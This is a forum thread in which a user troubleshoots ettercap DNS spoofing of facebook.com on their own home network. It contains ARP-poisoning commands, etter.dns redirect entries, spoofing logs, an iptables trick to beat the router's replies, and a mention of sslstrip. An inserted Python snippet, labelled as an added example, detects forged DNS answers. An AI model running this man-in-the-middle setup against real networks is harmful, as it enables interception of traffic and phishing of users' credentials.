Thread: DNS spoofing failing

  1. #1
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    10

    DNS spoofing failing

    This is going to be my first post here, but I've looked for the answer and found nothing.

    My environment is as follows:
    Target box: MacBook Pro running Snow Leopard (192.168.1.78).
    Attacker: Acer Aspire One running BT 5r3 with a wireless network adapter (192.168.1.64).
    Both are inside the local network with a 2wire router (192.168.1.254).

    I'm trying to do DNS spoofing to redirect DNS requests (facebook) from the target to a local IP (192.168.1.64).

    In my first attempts I used ettercap. I edited the etter.dns file as follows: "*.facebook.com A 192.168.1.64" and then I ran the command "ettercap -Tqi wlan1 -P dns_spoof -M arp /192.168.1.78/ /192.168.1.254/".
    After that I verified that the man-in-the-middle attack was working correctly, as I could capture traffic between the target and the router.
    However, the DNS spoof didn't work; the target could enter facebook without trouble.

    I rebooted the attacker computer with the native Win7 and ran Cain & Abel. I started the sniffer, selected the target, modified the ARP-DNS, poisoned, and even though I got full routing the spoofing continued failing.

    I switched machines, making the Aspire One the target, and booted my MacBook with the BT 5r3 live CD. I did the same procedure and failed.

    I seem to be unable to do the DNS spoofing and I want to know why.

    So my question would be: What am I missing? What changes do I need to perform? Do I need to modify my network settings?

    Thank you all for your help.
    I searched the forum for an answer and even though there are several threads on this topic, none addressed my problem, as I seem to fail no matter what program (ettercap, C&A, dnsspoof, etc.) I run.

  2. #2
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Re: DNS spoofing failing

    Hi. The router has probably cached the address and can serve it up quicker than the attacker's replies. You will have to wait approx. 20 mins without going to the site, or try some random URL in ettercap before going to the site.

  3. #3
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    10

    Re: DNS spoofing failing

    I see, so the attacker would have to be quicker than the router? Or is there another way? How can I corroborate that?
    I'll try your suggestion and reply!
    Thanks!

  4. #4
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    10

    Re: DNS spoofing failing

    Hey! Thanks for the advice; however, it still doesn't work, although I got more info.
    I modified etter.dns like "* A 192.168.1.74" so as to redirect all requests to my attacker. Not all pages worked; however, I typed a random site (blop.com) and it got redirected. Strangely, I did it again (akash.com) and it said that it couldn't find the host.
    I tried spoofing other sites like wikipedia, grooveshark, gmail, hotmail and other popular websites without luck.

    Could I reconfigure the router so it allows the attack?

    Thanks!

  5. #5
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    10

    Re: DNS spoofing failing

    Sorry for the multiple replies, but I'm experimenting.

    So I used Ethernet with my attacker and got more results.
    I also changed etter.dns to say this:
    facebook.com A 192.168.1.77
    *.facebook.com A 192.168.1.77
    www.facebook.com PTR 192.168.1.77

    And the command in ettercap to redirect the traffic from all my network:
    'ettercap -Tqi eth0 -P dns_spoof -M arp // /192.168.1.254/'


    After that I got these errors (although it says it is spoofing, my targets see no changes to their requests; they go to the real site):
    dns_spoof: [es-la.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [fr-fr.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [pt-br.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [de-de.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [it-it.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [ar-ar.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [hi-in.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [zh-cn.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [ja-jp.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [developers.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [zh-cn.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [ja-jp.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [developers.facebook.com] spoofed to [192.168.1.77]
    DHCP: [192.168.1.254] OFFER : 192.168.1.77 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254
    dns_spoof: [zh-cn.facebook.com] spoofed to [192.168.1.77]
    SEND L3 ERROR: 1591 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
    )
    SEND L3 ERROR: 1525 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
    )
    SEND L3 ERROR: 1525 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
    )
    SEND L3 ERROR: 1525 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
    )
    dns_spoof: [ja-jp.facebook.com] spoofed to [192.168.1.77]
    dns_spoof: [developers.facebook.com] spoofed to [192.168.1.77]
    DHCP: [192.168.1.254] ACK : 192.168.1.77 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "gateway.2wire.net"
    dns_spoof: [ja-jp.facebook.com] spoofed to [192.168.1.77]
    DHCP: [192.168.1.254] ACK : 192.168.1.77 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "gateway.2wire.net"
    dns_spoof: [developers.facebook.com] spoofed to [192.168.1.77]
    SEND L3 ERROR: 2932 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
    )
    SEND L3 ERROR: 1593 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
    )

  6. #6
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Re: DNS spoofing failing

    You could try dropping packets from the router "iptables -A INPUT -p udp --srcport 53 -src 192.168.1.1 -j DROP", to see if it's replying first.
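
The race discussed in replies #2 and #6, where the router's genuine answer and a forged one both reach the client, shows up on the wire as two different answers to the same DNS transaction. The following is an added example, not part of the thread: a Python check a defender can run over captured DNS response payloads to flag that condition and to flag names resolving into RFC 1918 space. The function names, the sample packets and the 203.0.113.10 / 198.51.100.7 addresses are constructed for illustration.

```python
import ipaddress
import struct
from collections import defaultdict

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def build_response(txid, qname, ip):  # helper that builds constructed sample packets only
    q = b"".join(bytes([len(lab)]) + lab.encode() for lab in qname.split(".")) + b"\x00"
    rr = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4) + ipaddress.ip_address(ip).packed
    return struct.pack("!6H", txid, 0x8180, 1, 1, 0, 0) + q + struct.pack("!HH", 1, 1) + rr

def parse_response(msg):
    """Return (txid, qname, frozenset of A addresses); assumes exactly one question."""
    txid, _flags, _qdcount, ancount = struct.unpack_from("!4H", msg)
    off, labels = 12, []
    while msg[off]:  # read the question name label by label
        labels.append(msg[off + 1:off + 1 + msg[off]].decode("ascii"))
        off += 1 + msg[off]
    off, addrs = off + 5, set()  # skip root label, QTYPE and QCLASS
    for _ in range(ancount):
        while msg[off] and msg[off] & 0xC0 != 0xC0:  # skip owner-name labels
            off += 1 + msg[off]
        off += 2 if msg[off] else 1  # compression pointer (2 bytes) or root label (1)
        rtype, _cls, _ttl, rdlen = struct.unpack_from("!HHIH", msg, off)
        if rtype == 1 and rdlen == 4:  # A record
            addrs.add(str(ipaddress.ip_address(msg[off + 10:off + 14])))
        off += 10 + rdlen
    return txid, ".".join(labels).lower(), frozenset(addrs)

def find_anomalies(packets):
    """packets: iterable of (client_ip, raw_dns_response); returns sorted alert tuples."""
    answers, alerts = defaultdict(set), set()
    for client, raw in packets:
        txid, name, addrs = parse_response(raw)
        answers[(client, txid, name)].add(addrs)
    for (client, _txid, name), seen in answers.items():
        ips = sorted(set().union(*seen))
        if len(seen) > 1:  # the same query was answered twice with different data
            alerts.add(("conflicting-answers", client, name, "|".join(ips)))
        alerts.update(("private-address-answer", client, name, ip) for ip in ips
                      if any(ipaddress.ip_address(ip) in net for net in RFC1918))
    return sorted(alerts)

# Constructed capture: one query answered twice (resolver and forger), one normal lookup.
SAMPLE = [("192.168.1.78", build_response(0x1A2B, "developers.facebook.com", a))
          for a in ("203.0.113.10", "192.168.1.77")]
SAMPLE.append(("192.168.1.78", build_response(0x1A2C, "example.org", "198.51.100.7")))

if __name__ == "__main__":
    print(*find_anomalies(SAMPLE), sep="\n")
```

Names that legitimately resolve to local addresses (for example a router's own hostname) will trigger the second alert and need an allowlist in practice.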

  7. #7
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    4

    Re: DNS spoofing failing

    I had a similar issue with what you were experiencing with ettercap and dns spoof.. this is what I did in my etter.dns to fix it:


    facebook.com A attacker.ip.here
    *.facebook.com A attacker.ip.here
    www.facebook.com PTR attacker.ip.here

    After that, it worked like a charm - not sure if yours was the same issue, but it worked for me.

    Also - for me I found out that (which is not your case) using VirtualBox to Regular PC broke it for me as well.. The attack would however work from PC to PC and sometimes from VM (VBOX) to VM (VBOX)

    Hope that helps!

    -DV

  8. #8
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    10

    Re: DNS spoofing failing

    Quote: Originally posted by DigitalV

    facebook.com A attacker.ip.here
    *.facebook.com A attacker.ip.here
    www.facebook.com PTR attacker.ip.here

    -DV
    Thank you for the tip; however, that is exactly what I did. I haven't managed to make it work yet; however, I believe it has something to do with my PC specs... I also tried modifying etter.conf to run it as root and use iptables.

    I really don't understand where the problem is...

    I did, however, find out that while facebook.com doesn't get redirected, developers.facebook.com does. My account runs with HTTPS (SSL), so perhaps there is a way to use sslstrip together with ettercap...
    although I don't know how to do that...
    Another thing is that changing the spoofed site to www.bopibloop.com, which actually doesn't exist, still doesn't get redirected...

    I'll keep researching and post a solution if I find one.

  9. #9
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Re: DNS spoofing failing

    Hi Ditto
    with this, can you try ifconfig eth0 mtu 1700 up
    "SEND L3 ERROR: 1525 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
    )"

  10. #10
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    10

    Re: DNS spoofing failing

    Hey! Sorry for the delay in answering...
    There has been no progress, but I'm inclined to believe this has to do with the modem.
    I'll try other methods for DNS spoofing.
    I'll write back when I figure it out; however, I would appreciate suggestions.
